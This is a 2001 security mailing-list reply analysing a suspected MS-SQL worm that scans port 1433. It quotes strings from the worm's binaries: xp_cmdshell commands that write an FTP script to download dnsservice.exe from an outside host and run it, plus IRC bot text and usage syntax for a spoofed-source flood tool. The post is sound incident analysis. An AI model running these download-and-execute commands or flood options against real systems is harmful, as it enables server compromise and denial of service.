Re: MS-SQL Worm?

[Paul Nasrat <pnasrat () uk now com>]

On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote:
> We saw a scan come in looking for systems answering on 1433, and
> immediately saw several systems start scanning out for other systems
> answering on 1433 - worm behavior?  Has anyone else seen this?

No, but the binaries it downloads:

win32mon.exe and dnsservice.exe 

Are on the ftp site in the dump.  I don't have a windows debugger to put
them through but they look interesting:

exec xp_cmdshell 'start dnsservice.exe'
exec xp_cmdshell 'del ftp.x'
exec xp_cmdshell 'ftp -s:ftp.x 
exec xp_cmdshell 'echo quit >> ftp.x'
exec xp_cmdshell 'echo close >> ftp.x'
exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x'
exec xp_cmdshell 'echo cd tmp>> ftp.x'
exec xp_cmdshell 'echo cd pub>> ftp.x'
exec xp_cmdshell 'echo bin>> ftp.x'
exec xp_cmdshell 'echo foo.com>> ftp.x'
exec xp_cmdshell 'echo ftp> ftp.x'

GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
[GET] - Unable to connect to http.
[GET] - Unable to resolve host.
http://
[GET] - Unable to create new socket.
GET <bot|wildcard> <host> <save as>
%s %s %s %s
NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu)
NICK %s
NOTICE %s :Nick cannot be larger than 9 characters.
NOTICE %s :NICK <nick>
sm6 has finished...
with tcp/syn boost!
sm6 icmp/udp has begun...
sm6 icmp/udp (w/pkt-push!) has begun..
Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src
port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t
include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file>

etc.

Paul Nasrat

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com